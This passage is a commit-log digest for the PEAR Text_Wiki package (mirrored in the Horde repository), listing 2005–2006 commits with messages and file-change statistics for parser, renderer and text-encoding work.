 Text/Wiki/Parse/Default/List.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/4d5ec6abc3a4f5c8455be2d0869e26e37beb1010

-----------------------------------------------------------------------

commit 1b748818031d98dea65714f99ddab0284524e5e2
Author: bertrand Gugger 
Date:   Tue Nov 8 19:15:02 2005 +0000

    Back release 1.0.3 (stable) late update in Default list parser intoduced a BBC
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 200249 c90b9560-bf6c-de11-be94-00142212c4b1

 package.xml | 37 +++++++++++++++++++++++--------------
 1 file changed, 23 insertions(+), 14 deletions(-)

http://github.com/horde/horde/commit/1b748818031d98dea65714f99ddab0284524e5e2

-----------------------------------------------------------------------

commit 1d3f504df5001a0a0a4e1be049a73135f13e2076
Author: bertrand Gugger 
Date:   Fri Nov 18 19:50:50 2005 +0000

    Notice: Only variables should be assigned by reference (bug #6010)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 200805 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Wikilink.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/1d3f504df5001a0a0a4e1be049a73135f13e2076

-----------------------------------------------------------------------

commit 355284ca10763308467efaba1828e9b430abd1b6
Author: bertrand Gugger 
Date:   Fri Nov 18 19:53:11 2005 +0000

    Only variables should be assigned by reference (bug #6010)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 200807 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Latex/Wikilink.php | 28 ++++++++++++++--------------
 1 file changed, 14 insertions(+), 14 deletions(-)

http://github.com/horde/horde/commit/355284ca10763308467efaba1828e9b430abd1b6

-----------------------------------------------------------------------

commit 2a9b38c616c541753fce7d29c868005a2a90c5ed
Author: Moritz Venn 
Date:   Tue Dec 6 15:29:29 2005 +0000

    Rendering Fix for Tables (Missing Whitespace)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 202250 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Table.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/2a9b38c616c541753fce7d29c868005a2a90c5ed

-----------------------------------------------------------------------

commit af3c663f2598bbf2bb3213e531273c0b95b48370
Author: Moritz Venn 
Date:   Tue Dec 6 15:55:00 2005 +0000

    Add new Parsers for Text_Wiki_Mediawiki
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 202252 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Mediawiki.php                 |  24 ++-
 Text/Wiki/Parse/Mediawiki/Heading.php   | 109 ++++++++++
 Text/Wiki/Parse/Mediawiki/Image.php     | 192 ++++++++++++++++++
 Text/Wiki/Parse/Mediawiki/Interwiki.php | 162 +++++++++++++++
 Text/Wiki/Parse/Mediawiki/Raw.php       |  73 +++++++
 Text/Wiki/Parse/Mediawiki/Table.php     |  10 +-
 Text/Wiki/Parse/Mediawiki/Toc.php       | 130 ++++++++++++
 Text/Wiki/Parse/Mediawiki/Url.php       | 348 ++++++++++++++++++++++++++++++++
 8 files changed, 1033 insertions(+), 15 deletions(-)
 create mode 100644 Text/Wiki/Parse/Mediawiki/Heading.php
 create mode 100644 Text/Wiki/Parse/Mediawiki/Image.php
 create mode 100644 Text/Wiki/Parse/Mediawiki/Interwiki.php
 create mode 100644 Text/Wiki/Parse/Mediawiki/Raw.php
 create mode 100644 Text/Wiki/Parse/Mediawiki/Toc.php
 create mode 100644 Text/Wiki/Parse/Mediawiki/Url.php

http://github.com/horde/horde/commit/af3c663f2598bbf2bb3213e531273c0b95b48370

-----------------------------------------------------------------------

commit dc2911850466518c7501d38ab6bbcbef1de58300
Author: bertrand Gugger 
Date:   Wed Dec 7 08:45:25 2005 +0000

    Corrected example loader, htmlspecialchar the source
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 202309 c90b9560-bf6c-de11-be94-00142212c4b1

 doc/test_Text_Wiki.php | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/dc2911850466518c7501d38ab6bbcbef1de58300

-----------------------------------------------------------------------

commit 2318e66cc6315dde9f72c31f2b29d83f739d6073
Author: Moritz Venn 
Date:   Sat Dec 31 13:25:59 2005 +0000

    File did not differ from the one in Default.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 204068 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Toc.php | 130 --------------------------------------
 1 file changed, 130 deletions(-)
 delete mode 100644 Text/Wiki/Parse/Mediawiki/Toc.php

http://github.com/horde/horde/commit/2318e66cc6315dde9f72c31f2b29d83f739d6073

-----------------------------------------------------------------------

commit 226f47eca00008199836ced9a4a3fdc3833f2e08
Author: Moritz Venn 
Date:   Fri Jan 6 15:42:38 2006 +0000

    Adding package.xml for Text_Wiki_Mediawiki
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 204687 c90b9560-bf6c-de11-be94-00142212c4b1

 packageMediawiki.xml | 46 ++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 46 insertions(+)
 create mode 100644 packageMediawiki.xml

http://github.com/horde/horde/commit/226f47eca00008199836ced9a4a3fdc3833f2e08

-----------------------------------------------------------------------

commit 9984e935d8d96e3515d8032dcafe8c63c7154d8f
Author: bertrand Gugger 
Date:   Sat Jan 7 04:49:37 2006 +0000

    seems I forgot the release date, anyway thanks ritzmo
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 204759 c90b9560-bf6c-de11-be94-00142212c4b1

 packageMediawiki.xml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/9984e935d8d96e3515d8032dcafe8c63c7154d8f

-----------------------------------------------------------------------

commit ac2513a6fe44ca17da28091d94f0f3cf97bfb558
Author: bertrand Gugger 
Date:   Tue Jan 24 19:08:33 2006 +0000

    Added Ooo , Pdf and Docbook in renderers to be tested, would be better to have free input.
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 205866 c90b9560-bf6c-de11-be94-00142212c4b1

 doc/test_Text_Wiki.php | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/ac2513a6fe44ca17da28091d94f0f3cf97bfb558

-----------------------------------------------------------------------

commit 6f4df3f83eeaaf5d31573197bc50c5f6be5f6b0b
Author: bertrand Gugger 
Date:   Sun Jan 29 23:29:21 2006 +0000

    Very sorry, forgot Text_Wiki does not use PEAR
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 206102 c90b9560-bf6c-de11-be94-00142212c4b1

 doc/test_Text_Wiki.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/6f4df3f83eeaaf5d31573197bc50c5f6be5f6b0b

-----------------------------------------------------------------------

commit 5c8d6d36032768579cd2dc3763e198cd95044cc8
Author: bertrand Gugger 
Date:   Mon Jan 30 15:03:27 2006 +0000

    Add the Wilink rule (#6623)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 206123 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Mediawiki.php                |  2 +-
 Text/Wiki/Parse/Mediawiki/Wikilink.php | 74 ++++++++++++++++++++++++++++++++++
 2 files changed, 75 insertions(+), 1 deletion(-)
 create mode 100644 Text/Wiki/Parse/Mediawiki/Wikilink.php

http://github.com/horde/horde/commit/5c8d6d36032768579cd2dc3763e198cd95044cc8

-----------------------------------------------------------------------

commit 388176385b6a0d9e34bd0368000cdbd44d9cf79f
Author: bertrand Gugger 
Date:   Mon Jan 30 15:09:08 2006 +0000

    Spaces around headings are not mandatory (#6623)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 206127 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Heading.php | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/388176385b6a0d9e34bd0368000cdbd44d9cf79f

-----------------------------------------------------------------------

commit e0a2dd99ca9ef058f4033aef5d0cc524cdc0814c
Author: bertrand Gugger 
Date:   Thu Feb 2 07:54:10 2006 +0000

    Handles errors more nicely (Text_Wiki includes PEAR only in that case)
    Changed Ooo in Ooosxw as per Lukas's request
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 206265 c90b9560-bf6c-de11-be94-00142212c4b1

 doc/test_Text_Wiki.php | 21 ++++++++++++++++++---
 1 file changed, 18 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/e0a2dd99ca9ef058f4033aef5d0cc524cdc0814c

-----------------------------------------------------------------------

commit c9f40c2d5136cfe3bc8292afec1ccf08712edeff
Author: bertrand Gugger 
Date:   Thu Feb 2 13:17:28 2006 +0000

    Let each php error display
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 206286 c90b9560-bf6c-de11-be94-00142212c4b1

 doc/test_Text_Wiki.php | 2 ++
 1 file changed, 2 insertions(+)

http://github.com/horde/horde/commit/c9f40c2d5136cfe3bc8292afec1ccf08712edeff

-----------------------------------------------------------------------

commit 548f31fd9095d0e665883befb148d0ca69157444
Author: bertrand Gugger 
Date:   Fri Feb 3 18:49:34 2006 +0000

    Starting the DocBook renderer , caution, only an half is yet ready,
    the rest just have headers done
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 206371 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Docbook/Anchor.php       |  40 +++++++
 Text/Wiki/Render/Docbook/Blockquote.php   |  53 +++++++++
 Text/Wiki/Render/Docbook/Bold.php         |  54 +++++++++
 Text/Wiki/Render/Docbook/Box.php          |  54 +++++++++
 Text/Wiki/Render/Docbook/Break.php        |  47 ++++++++
 Text/Wiki/Render/Docbook/Center.php       |  51 +++++++++
 Text/Wiki/Render/Docbook/Code.php         |  52 +++++++++
 Text/Wiki/Render/Docbook/Colortext.php    |  80 +++++++++++++
 Text/Wiki/Render/Docbook/Deflist.php      |  75 +++++++++++++
 Text/Wiki/Render/Docbook/Delimiter.php    |  46 ++++++++
 Text/Wiki/Render/Docbook/Embed.php        |  46 ++++++++
 Text/Wiki/Render/Docbook/Emphasis.php     |  55 +++++++++
 Text/Wiki/Render/Docbook/Font.php         |  59 ++++++++++
 Text/Wiki/Render/Docbook/Freelink.php     |  35 ++++++
 Text/Wiki/Render/Docbook/Function.php     |  73 ++++++++++++
 Text/Wiki/Render/Docbook/Heading.php      |  43 +++++++
 Text/Wiki/Render/Docbook/Horiz.php        |  46 ++++++++
 Text/Wiki/Render/Docbook/Html.php         |  48 ++++++++
 Text/Wiki/Render/Docbook/Image.php        | 180 ++++++++++++++++++++++++++++++
 Text/Wiki/Render/Docbook/Include.php      |  32 ++++++
 Text/Wiki/Render/Docbook/Interwiki.php    |  97 ++++++++++++++++
 Text/Wiki/Render/Docbook/Italic.php       |  54 +++++++++
 Text/Wiki/Render/Docbook/List.php         | 172 ++++++++++++++++++++++++++++
 Text/Wiki/Render/Docbook/Newline.php      |  35 ++++++
 Text/Wiki/Render/Docbook/Page.php         |  46 ++++++++
 Text/Wiki/Render/Docbook/Paragraph.php    |  59 ++++++++++
 Text/Wiki/Render/Docbook/Phplookup.php    |  80 +++++++++++++
 Text/Wiki/Render/Docbook/Plugin.php       |  47 ++++++++
 Text/Wiki/Render/Docbook/Prefilter.php    |  34 ++++++
 Text/Wiki/Render/Docbook/Preformatted.php |  46 ++++++++
 Text/Wiki/Render/Docbook/Raw.php          |  46 ++++++++
 Text/Wiki/Render/Docbook/Revise.php       |  68 +++++++++++
 Text/Wiki/Render/Docbook/Smiley.php       |  74 ++++++++++++
 Text/Wiki/Render/Docbook/Specialchar.php  |  52 +++++++++
 Text/Wiki/Render/Docbook/Strong.php       |  54 +++++++++
 Text/Wiki/Render/Docbook/Subscript.php    |  57 ++++++++++
 Text/Wiki/Render/Docbook/Superscript.php  |  57 ++++++++++
 Text/Wiki/Render/Docbook/Table.php        | 140 +++++++++++++++++++++++
 Text/Wiki/Render/Docbook/Tighten.php      |  34 ++++++
 Text/Wiki/Render/Docbook/Titlebar.php     |  57 ++++++++++
 Text/Wiki/Render/Docbook/Toc.php          | 115 +++++++++++++++++++
 Text/Wiki/Render/Docbook/Tt.php           |  58 ++++++++++
 Text/Wiki/Render/Docbook/Underline.php    |  57 ++++++++++
 Text/Wiki/Render/Docbook/Url.php          | 117 +++++++++++++++++++
 Text/Wiki/Render/Docbook/Wikilink.php     | 160 ++++++++++++++++++++++++++
 45 files changed, 2985 insertions(+)
 create mode 100644 Text/Wiki/Render/Docbook/Anchor.php
 create mode 100644 Text/Wiki/Render/Docbook/Blockquote.php
 create mode 100644 Text/Wiki/Render/Docbook/Bold.php
 create mode 100644 Text/Wiki/Render/Docbook/Box.php
 create mode 100644 Text/Wiki/Render/Docbook/Break.php
 create mode 100644 Text/Wiki/Render/Docbook/Center.php
 create mode 100644 Text/Wiki/Render/Docbook/Code.php
 create mode 100644 Text/Wiki/Render/Docbook/Colortext.php
 create mode 100644 Text/Wiki/Render/Docbook/Deflist.php
 create mode 100644 Text/Wiki/Render/Docbook/Delimiter.php
 create mode 100644 Text/Wiki/Render/Docbook/Embed.php
 create mode 100644 Text/Wiki/Render/Docbook/Emphasis.php
 create mode 100644 Text/Wiki/Render/Docbook/Font.php
 create mode 100644 Text/Wiki/Render/Docbook/Freelink.php
 create mode 100644 Text/Wiki/Render/Docbook/Function.php
 create mode 100644 Text/Wiki/Render/Docbook/Heading.php
 create mode 100644 Text/Wiki/Render/Docbook/Horiz.php
 create mode 100644 Text/Wiki/Render/Docbook/Html.php
 create mode 100644 Text/Wiki/Render/Docbook/Image.php
 create mode 100644 Text/Wiki/Render/Docbook/Include.php
 create mode 100644 Text/Wiki/Render/Docbook/Interwiki.php
 create mode 100644 Text/Wiki/Render/Docbook/Italic.php
 create mode 100644 Text/Wiki/Render/Docbook/List.php
 create mode 100644 Text/Wiki/Render/Docbook/Newline.php
 create mode 100644 Text/Wiki/Render/Docbook/Page.php
 create mode 100644 Text/Wiki/Render/Docbook/Paragraph.php
 create mode 100644 Text/Wiki/Render/Docbook/Phplookup.php
 create mode 100644 Text/Wiki/Render/Docbook/Plugin.php
 create mode 100644 Text/Wiki/Render/Docbook/Prefilter.php
 create mode 100644 Text/Wiki/Render/Docbook/Preformatted.php
 create mode 100644 Text/Wiki/Render/Docbook/Raw.php
 create mode 100644 Text/Wiki/Render/Docbook/Revise.php
 create mode 100644 Text/Wiki/Render/Docbook/Smiley.php
 create mode 100644 Text/Wiki/Render/Docbook/Specialchar.php
 create mode 100644 Text/Wiki/Render/Docbook/Strong.php
 create mode 100644 Text/Wiki/Render/Docbook/Subscript.php
 create mode 100644 Text/Wiki/Render/Docbook/Superscript.php
 create mode 100644 Text/Wiki/Render/Docbook/Table.php
 create mode 100644 Text/Wiki/Render/Docbook/Tighten.php
 create mode 100644 Text/Wiki/Render/Docbook/Titlebar.php
 create mode 100644 Text/Wiki/Render/Docbook/Toc.php
 create mode 100644 Text/Wiki/Render/Docbook/Tt.php
 create mode 100644 Text/Wiki/Render/Docbook/Underline.php
 create mode 100644 Text/Wiki/Render/Docbook/Url.php
 create mode 100644 Text/Wiki/Render/Docbook/Wikilink.php

http://github.com/horde/horde/commit/548f31fd9095d0e665883befb148d0ca69157444

-----------------------------------------------------------------------

commit eeb902c6cedd9efa017a754fd612c4e25f994104
Author: bertrand Gugger 
Date:   Fri Feb 3 19:37:31 2006 +0000

    urlencode() the page name and anchor as they are used in the query part of the url
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 206373 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Wikilink.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/eeb902c6cedd9efa017a754fd612c4e25f994104

-----------------------------------------------------------------------

commit 46697cedb549044ae56ceed8d5976f08ddbe9cff
Author: bertrand Gugger 
Date:   Fri Feb 3 19:45:27 2006 +0000

    #6623: missing quantifier '?'
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 206374 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Wikilink.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/46697cedb549044ae56ceed8d5976f08ddbe9cff

-----------------------------------------------------------------------

commit d798cb84720222af705c34408ad9b3f15aa02a1e
Author: bertrand Gugger 
Date:   Fri Feb 3 19:47:02 2006 +0000

    A space is enough to delimitate a heading, no need for a linefeed (#6623)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 206375 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Heading.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/d798cb84720222af705c34408ad9b3f15aa02a1e

-----------------------------------------------------------------------

commit 3818bb50b6dae9a2d4693ea7974666029647ea90
Author: bertrand Gugger 
Date:   Sat Feb 4 10:21:57 2006 +0000

    Some more rules , 35/45 done ...
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 206394 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Docbook/Embed.php        |  3 ++-
 Text/Wiki/Render/Docbook/Include.php      |  2 +-
 Text/Wiki/Render/Docbook/Newline.php      |  3 +--
 Text/Wiki/Render/Docbook/Page.php         |  2 +-
 Text/Wiki/Render/Docbook/Paragraph.php    | 16 +++-------------
 Text/Wiki/Render/Docbook/Preformatted.php |  2 +-
 Text/Wiki/Render/Docbook/Revise.php       | 31 ++++++++++++-------------------
 Text/Wiki/Render/Docbook/Specialchar.php  | 26 +++++++++++++-------------
 Text/Wiki/Render/Docbook/Subscript.php    | 12 ++----------
 Text/Wiki/Render/Docbook/Superscript.php  | 12 ++----------
 Text/Wiki/Render/Docbook/Tt.php           | 13 ++-----------
 Text/Wiki/Render/Docbook/Underline.php    | 11 ++++-------
 12 files changed, 44 insertions(+), 89 deletions(-)

http://github.com/horde/horde/commit/3818bb50b6dae9a2d4693ea7974666029647ea90

-----------------------------------------------------------------------

commit 0026d4701d51c60dc9bb19648cc82772648e00d9
Author: bertrand Gugger 
Date:   Sat Feb 4 15:56:15 2006 +0000

    3 more rules (84%)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 206400 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Docbook/List.php   | 121 +++++++-----------------------------
 Text/Wiki/Render/Docbook/Revise.php |   4 +-
 2 files changed, 24 insertions(+), 101 deletions(-)

http://github.com/horde/horde/commit/0026d4701d51c60dc9bb19648cc82772648e00d9

-----------------------------------------------------------------------

commit 1002f2ac968b2168fa9cd8f8f59fa547bffcdb9c
Author: bertrand Gugger 
Date:   Sat Feb 4 19:53:06 2006 +0000

    Piano ma sano (hopefuly) going on ...
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 206415 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Docbook/Phplookup.php | 25 ++-----------------------
 1 file changed, 2 insertions(+), 23 deletions(-)

http://github.com/horde/horde/commit/1002f2ac968b2168fa9cd8f8f59fa547bffcdb9c

-----------------------------------------------------------------------

commit 1c99ac470e4b67e8f3b1c250f22dd55039d5663e
Author: bertrand Gugger 
Date:   Sat Feb 4 20:03:13 2006 +0000

    Arrange comment
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 206417 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Docbook/Raw.php | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

http://github.com/horde/horde/commit/1c99ac470e4b67e8f3b1c250f22dd55039d5663e

-----------------------------------------------------------------------

commit 15078532b9bc73ae866451fedaf40c041df3d56b
Author: bertrand Gugger 
Date:   Sun Feb 5 07:33:08 2006 +0000

    Autofind parser in test files must be case sensitive
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 206438 c90b9560-bf6c-de11-be94-00142212c4b1

 doc/test_Text_Wiki.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/15078532b9bc73ae866451fedaf40c041df3d56b

-----------------------------------------------------------------------

commit a8d3c2b289b04201e93d7a860494e4f025030131
Author: bertrand Gugger 
Date:   Sun Feb 5 07:36:31 2006 +0000

    Swallow away line breaks within the lists
    Starting count by zero as Xhtml render relies on it
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 206439 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/BBCode/List.php | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/a8d3c2b289b04201e93d7a860494e4f025030131

-----------------------------------------------------------------------

commit adbec6803c9d4e2702f778e3532e97e0eace7dcd
Author: bertrand Gugger 
Date:   Sun Feb 5 08:23:56 2006 +0000

    Page names must be urlencoded in the query, not htmlspecialchared (may contain spaces)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 206442 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Interwiki.php | 3 ++-
 Text/Wiki/Render/Xhtml/Phplookup.php | 3 ++-
 2 files changed, 4 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/adbec6803c9d4e2702f778e3532e97e0eace7dcd

-----------------------------------------------------------------------

commit e29d99bb4898fcca747a7728ad9aaa97a8660943
Author: bertrand Gugger 
Date:   Sun Feb 5 16:17:24 2006 +0000

    the 38th rule ...
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 206493 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Docbook/Interwiki.php | 27 ++-------------------------
 1 file changed, 2 insertions(+), 25 deletions(-)

http://github.com/horde/horde/commit/e29d99bb4898fcca747a7728ad9aaa97a8660943

-----------------------------------------------------------------------

commit 05e91cb32f2b898a2c2f7a61e8ba5f5ec975df83
Author: bertrand Gugger 
Date:   Sun Feb 5 16:20:18 2006 +0000

    The basic (now empty) basic Render class for Docbook
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 206494 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Docbook.php | 45 ++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 45 insertions(+)
 create mode 100644 Text/Wiki/Render/Docbook.php

http://github.com/horde/horde/commit/05e91cb32f2b898a2c2f7a61e8ba5f5ec975df83

-----------------------------------------------------------------------

commit fc1ec64ef265af93dcacc3b013cda48e34cbe4b6
Author: bertrand Gugger 
Date:   Mon Feb 6 08:45:47 2006 +0000

    Updated changelog , prepare release
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 206555 c90b9560-bf6c-de11-be94-00142212c4b1

 packageBBCode.xml | 35 ++++++++++++++++++++++++-----------
 1 file changed, 24 insertions(+), 11 deletions(-)

http://github.com/horde/horde/commit/fc1ec64ef265af93dcacc3b013cda48e34cbe4b6

-----------------------------------------------------------------------

commit 28d09d7f76d0add251c548cd248b85f784615575
Author: bertrand Gugger 
Date:   Mon Feb 6 08:49:22 2006 +0000

    Correct changelog
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 206556 c90b9560-bf6c-de11-be94-00142212c4b1

 packageBBCode.xml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/28d09d7f76d0add251c548cd248b85f784615575

-----------------------------------------------------------------------

commit ec91795b7d8af54244006ee6b8217e1682b743ce
Author: bertrand Gugger 
Date:   Mon Feb 6 20:30:14 2006 +0000

    Makes the sectioning configurable and the section levels sequential
    (a special dedicace for mj :) )
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 206597 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Docbook/Heading.php | 157 +++++++++++++++++++++++++++++++++--
 1 file changed, 149 insertions(+), 8 deletions(-)

http://github.com/horde/horde/commit/ec91795b7d8af54244006ee6b8217e1682b743ce

-----------------------------------------------------------------------

commit d53d636c81ff4ee6dc4365b4ae4125282536f779
Author: bertrand Gugger 
Date:   Mon Feb 6 20:40:29 2006 +0000

    Empty section in configuration strips the sections for a level
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 206600 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Docbook/Heading.php | 1 +
 1 file changed, 1 insertion(+)

http://github.com/horde/horde/commit/d53d636c81ff4ee6dc4365b4ae4125282536f779

-----------------------------------------------------------------------

commit fff35d9a4751c60dfc124dadfb38905d2552bf2b
Author: bertrand Gugger 
Date:   Fri Feb 10 17:24:58 2006 +0000

    A method for cms needing several parsing in a session,
    also simplify the instanciation. Merci davidc for comments
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 206922 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki.php          | 36 ++++++++++++++++++++++++++++++++++++
 doc/test_Text_Wiki.php | 12 +++---------
 2 files changed, 39 insertions(+), 9 deletions(-)

http://github.com/horde/horde/commit/fff35d9a4751c60dfc124dadfb38905d2552bf2b

-----------------------------------------------------------------------

commit ca7945f34e84f398e5b7489ab535f0899e641569
Author: bertrand Gugger 
Date:   Fri Feb 10 18:10:23 2006 +0000

    Abstract encodings for text and urls, prepare #5953 cleaning
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 206930 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render.php | 27 +++++++++++++++++++++++++++
 1 file changed, 27 insertions(+)

http://github.com/horde/horde/commit/ca7945f34e84f398e5b7489ab535f0899e641569

-----------------------------------------------------------------------

commit 74a59dd50016c87ba4488ea7afd916c2f3482fd9
Author: bertrand Gugger 
Date:   Fri Feb 10 18:31:15 2006 +0000

    Wrapping the urlencoding
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 206935 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Docbook/Interwiki.php | 2 +-
 Text/Wiki/Render/Docbook/Phplookup.php | 2 +-
 Text/Wiki/Render/Docbook/Url.php       | 2 --
 Text/Wiki/Render/Docbook/Wikilink.php  | 4 ++--
 Text/Wiki/Render/Xhtml/Interwiki.php   | 2 +-
 Text/Wiki/Render/Xhtml/Phplookup.php   | 2 +-
 Text/Wiki/Render/Xhtml/Wikilink.php    | 4 ++--
 7 files changed, 8 insertions(+), 10 deletions(-)

http://github.com/horde/horde/commit/74a59dd50016c87ba4488ea7afd916c2f3482fd9

-----------------------------------------------------------------------

commit 35ca37a4cf88b60137a497c463edb705b55438f2
Author: bertrand Gugger 
Date:   Fri Feb 10 22:31:50 2006 +0000

    Overwrites and uses textEncode() for text translation
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 206939 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml.php | 43 +++++++++++++++++++++++++++++--------------
 1 file changed, 29 insertions(+), 14 deletions(-)

http://github.com/horde/horde/commit/35ca37a4cf88b60137a497c463edb705b55438f2

-----------------------------------------------------------------------

commit 6deeb9134b2cdd86adb467a9dea13056e55baad8
Author: bertrand Gugger 
Date:   Fri Feb 10 23:07:03 2006 +0000

    Common text encoding (#5953)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 206940 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Anchor.php    |  2 +-
 Text/Wiki/Render/Xhtml/Code.php      |  4 ++--
 Text/Wiki/Render/Xhtml/Function.php  | 16 ++++++++--------
 Text/Wiki/Render/Xhtml/Image.php     | 10 +++++-----
 Text/Wiki/Render/Xhtml/Interwiki.php |  4 ++--
 Text/Wiki/Render/Xhtml/Phplookup.php |  4 ++--
 Text/Wiki/Render/Xhtml/Smiley.php    |  2 +-
 Text/Wiki/Render/Xhtml/Url.php       |  8 ++++----
 Text/Wiki/Render/Xhtml/Wikilink.php  |  2 +-
 9 files changed, 26 insertions(+), 26 deletions(-)

http://github.com/horde/horde/commit/6deeb9134b2cdd86adb467a9dea13056e55baad8

-----------------------------------------------------------------------

commit 15b5f7a1686009e50ecec746dd777297d1a453a0
Author: bertrand Gugger 
Date:   Sat Feb 11 06:58:39 2006 +0000

    Default text encoding to htmlspecialchars
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 206949 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render.php | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/15b5f7a1686009e50ecec746dd777297d1a453a0

-----------------------------------------------------------------------

commit e8f6a98454443d4ee406c4e0833fa5d334e5f44d
Author: bertrand Gugger 
Date:   Sat Feb 11 07:16:37 2006 +0000

    Use text encoding wrapper
    
